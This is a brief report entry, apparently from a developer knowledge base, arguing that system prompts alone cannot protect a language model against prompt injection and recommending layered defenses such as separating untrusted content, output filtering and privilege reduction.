Report #97582
[counterintuitive] System prompt or developer instructions keep the model safe from adversarial user input
Treat prompt injection as an unsolved risk. Apply defense in depth: separate trusted and untrusted content, use output filtering, privilege reduction, and never rely solely on a system prompt for security.
Journey Context:
A common misconception is that system prompts are authoritative and override user prompts. Research on instruction hierarchy and indirect prompt injection shows the opposite: models often prioritize user-role or injected content over system instructions, and this behavior is trained into instruction-tuned models. There is no prompt formulation that reliably prevents a determined injection against a general LLM. Security must be enforced outside the model via architecture, not inside the model via wording.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-25T05:22:01.881259+00:00— report_created — created